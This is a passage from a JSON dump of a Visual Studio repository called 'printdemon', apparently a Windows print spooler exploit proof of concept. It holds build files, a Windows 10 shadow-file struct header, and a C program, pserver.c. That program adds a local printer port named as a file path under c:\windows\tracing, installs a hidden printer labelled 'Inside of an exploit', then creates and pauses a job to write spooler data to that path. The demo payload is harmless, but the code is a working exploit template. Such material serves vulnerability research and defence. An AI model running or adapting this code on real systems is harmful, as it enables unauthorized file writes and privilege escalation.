Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "printdemon.sln",
    "content": "﻿\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.29911.98\nMinimumVisualStudioVersion = 10.0.40219.1\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"printserver\", \"printserver\\printserver.vcxproj\", \"{B18A8548-199C-48BF-981B-18B8CA43FA9A}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"printclient\", \"printclient\\printclient.vcxproj\", \"{26E2F7F8-6626-4F1C-8F23-26BAA7253CB2}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|x64 = Debug|x64\n\t\tDebug|x86 = Debug|x86\n\t\tRelease|x64 = Release|x64\n\t\tRelease|x86 = Release|x86\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{B18A8548-199C-48BF-981B-18B8CA43FA9A}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{B18A8548-199C-48BF-981B-18B8CA43FA9A}.Debug|x64.Build.0 = Debug|x64\n\t\t{B18A8548-199C-48BF-981B-18B8CA43FA9A}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{B18A8548-199C-48BF-981B-18B8CA43FA9A}.Debug|x86.Build.0 = Debug|Win32\n\t\t{B18A8548-199C-48BF-981B-18B8CA43FA9A}.Release|x64.ActiveCfg = Release|x64\n\t\t{B18A8548-199C-48BF-981B-18B8CA43FA9A}.Release|x64.Build.0 = Release|x64\n\t\t{B18A8548-199C-48BF-981B-18B8CA43FA9A}.Release|x86.ActiveCfg = Release|Win32\n\t\t{B18A8548-199C-48BF-981B-18B8CA43FA9A}.Release|x86.Build.0 = Release|Win32\n\t\t{26E2F7F8-6626-4F1C-8F23-26BAA7253CB2}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{26E2F7F8-6626-4F1C-8F23-26BAA7253CB2}.Debug|x64.Build.0 = Debug|x64\n\t\t{26E2F7F8-6626-4F1C-8F23-26BAA7253CB2}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{26E2F7F8-6626-4F1C-8F23-26BAA7253CB2}.Debug|x86.Build.0 = Debug|Win32\n\t\t{26E2F7F8-6626-4F1C-8F23-26BAA7253CB2}.Release|x64.ActiveCfg = Release|x64\n\t\t{26E2F7F8-6626-4F1C-8F23-26BAA7253CB2}.Release|x64.Build.0 = Release|x64\n\t\t{26E2F7F8-6626-4F1C-8F23-26BAA7253CB2}.Release|x86.ActiveCfg = 
Release|Win32\n\t\t{26E2F7F8-6626-4F1C-8F23-26BAA7253CB2}.Release|x86.Build.0 = Release|Win32\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\n\tGlobalSection(ExtensibilityGlobals) = postSolution\n\t\tSolutionGuid = {DB264CF3-973B-40A9-AA22-6BD94600603A}\n\tEndGlobalSection\nEndGlobal\n"
  },
  {
    "path": "printserver/printserver.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <VCProjectVersion>16.0</VCProjectVersion>\n    <Keyword>Win32Proj</Keyword>\n    <ProjectGuid>{b18a8548-199c-48bf-981b-18b8ca43fa9a}</ProjectGuid>\n    <RootNamespace>printploit</RootNamespace>\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\n    <ProjectName>printserver</ProjectName>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v142</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v142</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup 
Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v142</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v142</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"Shared\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" 
Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>false</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    
<ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>\n      <BasicRuntimeChecks>Default</BasicRuntimeChecks>\n      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>\n      <BufferSecurityCheck>true</BufferSecurityCheck>\n      <TreatWarningAsError>true</TreatWarningAsError>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <AdditionalDependencies>ws2_32.lib;ntdll.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)</AdditionalDependencies>\n      <UACExecutionLevel>AsInvoker</UACExecutionLevel>\n      <EntryPointSymbol>\n      </EntryPointSymbol>\n      <IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>false</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <ClCompile Include=\"pserver.c\" />\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup 
Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "printserver/pserver.c",
    "content": "#include <windows.h>\n#include <stdio.h>\n\nLPWSTR g_DriverName = L\"Generic / Text Only\";\nLPWSTR g_PortName = L\"c:\\\\windows\\\\tracing\\\\demoport.txt\";\nLPWSTR g_PrinterName = L\"PrintDemon\";\n\nINT\nmain (\n    _In_ INT ArgumentCount,\n    _In_ PCHAR Arguments[]\n    )\n{\n    HRESULT hr;\n    PRINTER_INFO_2 printerInfo;\n    HANDLE hPrinter;\n    HANDLE hMonitor;\n    BOOL bRes;\n    DWORD dwNeeded, dwStatus;\n    PRINTER_DEFAULTS printerDefaults;\n    DWORD dwExists;\n    struct\n    {\n        ADDJOB_INFO_1 jobInfo;\n        WCHAR pathString[MAX_PATH];\n    } job;\n    BOOL bPrintWithSpooler;\n    DWORD dwJobId;\n    PCHAR printerData = \"Hello! This is data from your printer :-)\";\n    DOC_INFO_1 docInfo;\n    HANDLE hSpool;\n\n    //\n    // Initialize variables\n    //\n    UNREFERENCED_PARAMETER(Arguments);\n    ZeroMemory(&job, sizeof(job));\n    bPrintWithSpooler = TRUE;\n    hPrinter = NULL;\n    hMonitor = NULL;\n    if (ArgumentCount > 1)\n    {\n        bPrintWithSpooler = FALSE;\n    }\n\n    //\n    // Open a handle to the XCV port of the local spooler\n    //\n    printerDefaults.pDatatype = NULL;\n    printerDefaults.pDevMode = NULL;\n    printerDefaults.DesiredAccess = SERVER_ACCESS_ADMINISTER;\n    bRes = OpenPrinter(L\",XcvMonitor Local Port\", &hMonitor, &printerDefaults);\n    if (bRes == FALSE)\n    {\n        printf(\"Error opening XCV handle: %lx\\n\", GetLastError());\n        goto CleanupPath;\n    }\n\n    //\n    // Check if the target port name already exists \n    //\n    dwNeeded = ((DWORD)wcslen(g_PortName) + 1) * sizeof(WCHAR);\n    dwExists = 0;\n    bRes = XcvData(hMonitor,\n                    L\"PortExists\",\n                    (LPBYTE)g_PortName,\n                    dwNeeded,\n                    (LPBYTE)&dwExists,\n                    sizeof(dwExists),\n                    &dwNeeded,\n                    &dwStatus);\n    if (dwExists == 0)\n    {\n        //\n        // It doesn't, so create 
it!\n        //\n        dwNeeded = ((DWORD)wcslen(g_PortName) + 1) * sizeof(WCHAR);\n        bRes = XcvData(hMonitor,\n                        L\"AddPort\",\n                        (LPBYTE)g_PortName,\n                        dwNeeded,\n                        NULL,\n                        0,\n                        &dwNeeded,\n                        &dwStatus);\n        if (bRes == FALSE)\n        {\n            printf(\"Failed to add port: %lx\\n\", dwStatus);\n            goto CleanupPath;\n        }\n    }\n\n    //\n    // Check if the printer already exists\n    //\n    printerDefaults.pDatatype = NULL;\n    printerDefaults.pDevMode = NULL;\n    printerDefaults.DesiredAccess = PRINTER_ALL_ACCESS;\n    bRes = OpenPrinter(g_PrinterName, &hPrinter, &printerDefaults);\n    if ((bRes == FALSE) && (GetLastError() == ERROR_INVALID_PRINTER_NAME))\n    {\n        //\n        // First, install the generic text only driver. Because this is already\n        // installed, no privileges are required to do so.\n        //\n        hr = InstallPrinterDriverFromPackage(NULL, NULL, g_DriverName, NULL, 0);\n        if (FAILED(hr))\n        {\n            printf(\"Failed to install print driver: %lx\\n\", hr);\n            goto CleanupPath;\n        }\n\n        //\n        // Now create a printer to attach to this port\n        // This data must be valid and match what we created earlier\n        //\n        ZeroMemory(&printerInfo, sizeof(printerInfo));\n        printerInfo.pPortName = g_PortName;\n        printerInfo.pDriverName = g_DriverName;\n        printerInfo.pPrinterName = g_PrinterName;\n\n        //\n        // This data must always be as indicated here\n        //\n        printerInfo.pPrintProcessor = L\"WinPrint\";\n        printerInfo.pDatatype = L\"RAW\";\n\n        //\n        // This part is for fun/to find our printer easily\n        //\n        printerInfo.pComment = L\"I'd be careful with this one...\";\n        printerInfo.pLocation = L\"Inside of an 
exploit\";\n        printerInfo.Attributes = PRINTER_ATTRIBUTE_RAW_ONLY | PRINTER_ATTRIBUTE_HIDDEN;\n        printerInfo.AveragePPM = 9001;\n        hPrinter = AddPrinter(NULL, 2, (LPBYTE)&printerInfo);\n        if (hPrinter == NULL)\n        {\n            printf(\"Failed to create printer: %lx\\n\", GetLastError());\n            goto CleanupPath;\n        }\n    }\n\n    //\n    // Purge the printer of any previous jobs\n    //\n    bRes = SetPrinter(hPrinter, 0, NULL, PRINTER_CONTROL_PURGE);\n    if (bRes == FALSE)\n    {\n        printf(\"Failed to purge jobs: %lx\\n\", GetLastError());\n        goto CleanupPath;\n    }\n\n    //\n    // Are we printing with GDI, or with the spooler?\n    //\n    if (bPrintWithSpooler == TRUE)\n    {\n        //\n        // Manually add a new job\n        //\n        bRes = AddJob(hPrinter, 1, (LPBYTE)&job, sizeof(job), &dwNeeded);\n        if (bRes == FALSE)\n        {\n            printf(\"Failed to add job: %lx\\n\", GetLastError());\n            goto CleanupPath;\n        }\n\n        //\n        // Save the Job ID\n        //\n        dwJobId = job.jobInfo.JobId;\n    }\n    else\n    {\n        //\n        // Use the GDI API to start a new print job\n        //\n        docInfo.pDatatype = L\"RAW\";\n        docInfo.pOutputFile = NULL;\n        docInfo.pDocName = L\"Ignore Me\";\n        dwJobId = StartDocPrinter(hPrinter, 1, (LPBYTE)&docInfo);\n    }\n\n    //\n    // Pause it, so it never actually prints\n    //\n    printf(\"[+] Created Job ID: %d\\n\", dwJobId);\n    bRes = SetJob(hPrinter, dwJobId, 0, NULL, JOB_CONTROL_PAUSE);\n    if (bRes == FALSE)\n    {\n        printf(\"[-] Failed to pause job: %lx\\n\", GetLastError());\n        goto CleanupPath;\n    }\n\n    //\n    // Check if we're manually printing or using the GDI API\n    //\n    if (bPrintWithSpooler == TRUE)\n    {\n        //\n        // Open the spooler file\n        //\n        printf(\"[.] 
Opening spooler job: %S\\n\", job.jobInfo.Path);\n        hSpool = CreateFile(job.jobInfo.Path,\n                            GENERIC_WRITE,\n                            0,\n                            NULL,\n                            CREATE_NEW,\n                            0,\n                            NULL);\n        if (hSpool == INVALID_HANDLE_VALUE)\n        {\n            printf(\"[-] Failed to open spooler file: %lx\\n\", GetLastError());\n            goto CleanupPath;\n        }\n\n        //\n        // Write the data\n        //\n        bRes = WriteFile(hSpool,\n                         printerData,\n                         (DWORD)strlen(printerData),\n                         &dwNeeded,\n                         NULL);\n        if (bRes == FALSE)\n        {\n            printf(\"[-] Failed to write the spooler data: %lx\\n\", GetLastError());\n            CloseHandle(hSpool);\n            goto CleanupPath;\n        }\n\n        //\n        // Done with the spooler file and schedule it\n        //\n        CloseHandle(hSpool);\n        ScheduleJob(hPrinter, dwJobId);\n    }\n    else\n    {\n        //\n        // Write the data\n        //\n        bRes = WritePrinter(hPrinter,\n                            printerData,\n                            (DWORD)strlen(printerData),\n                            &dwNeeded);\n        if (bRes == FALSE)\n        {\n            printf(\"[-] Failed to write the spooler data: %lx\\n\", GetLastError());\n            goto CleanupPath;\n        }\n\n        //\n        // Schedule the job for spooling\n        //\n        EndDocPrinter(hPrinter);\n    }\n\n    //\n    // Wait for the client to read it\n    //\n    printf(\"[+] Launch client... 
and press ENTER after\\n\");\n    getchar();\n\nCleanupPath:\n    //\n    // Now delete the printer and close the handle\n    //\n    if (hPrinter != NULL)\n    {\n        bRes = DeletePrinter(hPrinter);\n        if (bRes == FALSE)\n        {\n            //\n            // Non fatal, this is the cleanup path\n            //\n            printf(\"[-] Failed to delete printer: %lx\\n\", GetLastError());\n        }\n        printf(\"[+] Printer deleted\\n\");\n        ClosePrinter(hPrinter);\n    }\n\n    //\n    // Cleanup our port\n    //\n    if (hMonitor != NULL)\n    {\n        dwNeeded = ((DWORD)wcslen(g_PortName) + 1) * sizeof(WCHAR);\n        bRes = XcvData(hMonitor,\n                       L\"DeletePort\",\n                       (LPBYTE)g_PortName,\n                       dwNeeded,\n                       NULL,\n                       0,\n                       &dwNeeded,\n                       &dwStatus);\n        if (bRes == FALSE)\n        {\n            //\n            // Non fatal, this is the cleanup path\n            //\n            printf(\"[-] Failed to delete port: %lx\\n\", GetLastError());\n        }\n\n        //\n        // Close the monitor port\n        //\n        printf(\"[+] Port deleted\\n\");\n        ClosePrinter(hMonitor);\n    }\n    return 0;\n}\n"
  },
  {
    "path": "shdfile4.h",
    "content": "/*++\n\n    Copyright (C) Alex Ionescu. All rights reserved.\n    Copyright (C) Microsoft Corporation. All rights reserved.\n\nModule Name:\n\n    shdfile4.h\n\nAbstract:\n\n    Contains the definition of SHADOWFILE_4 reverse engineered for Windows 10\n\nEnvironment:\n\n    User Mode\n\nRevision History:\n\n    Added definition for Windows 10 Shadow Files - ionescu007 - 12 May 20\n\n--*/\n\n#define SF_SIGNATURE_4      0x5123  /* 'Q#' is the signature value */\n#define SF_VERSION_4        4\ntypedef struct _SHADOWFILE_4\n{\n    DWORD signature;\n    DWORD HeaderSize;\n    DWORD Status;\n    DWORD JobId;\n    DWORD Priority;\n    LPWSTR pNotify;\n    LPWSTR pUser;\n    LPWSTR pDocument;\n    LPWSTR pOutputFile;\n    LPWSTR pPrinterName;\n    LPWSTR pDriverName;\n    LPDEVMODE pDevMode;\n    LPWSTR pPrintProcName;\n    LPWSTR pDatatype;\n    LPWSTR pParameters;\n    SYSTEMTIME Submitted;\n    DWORD StartTime;\n    DWORD UntilTime;\n    DWORD Size;\n    DWORD cPages;\n    DWORD cbSecurityDescriptor;\n    PSECURITY_DESCRIPTOR pSecurityDescriptor;\n    DWORD NextJobId;\n    DWORD Version;\n    DWORD dwReboots;\n    LPWSTR pMachineName;\n    DWORD TotalSize;\n    LPWSTR pUserSid;\n    LPWSTR pFilePool;\n    DWORD SizeHigh;\n    DWORD TotalSizeHigh;\n    DWORD NamedPropertiesSize;\n    LPWSTR NamedProperties;\n} SHADOWFILE_4, *PSHADOWFILE_4;\n#ifdef _M_AMD64\nC_ASSERT(sizeof(SHADOWFILE_4) == 0xE0);\n#endif\n"
  }
]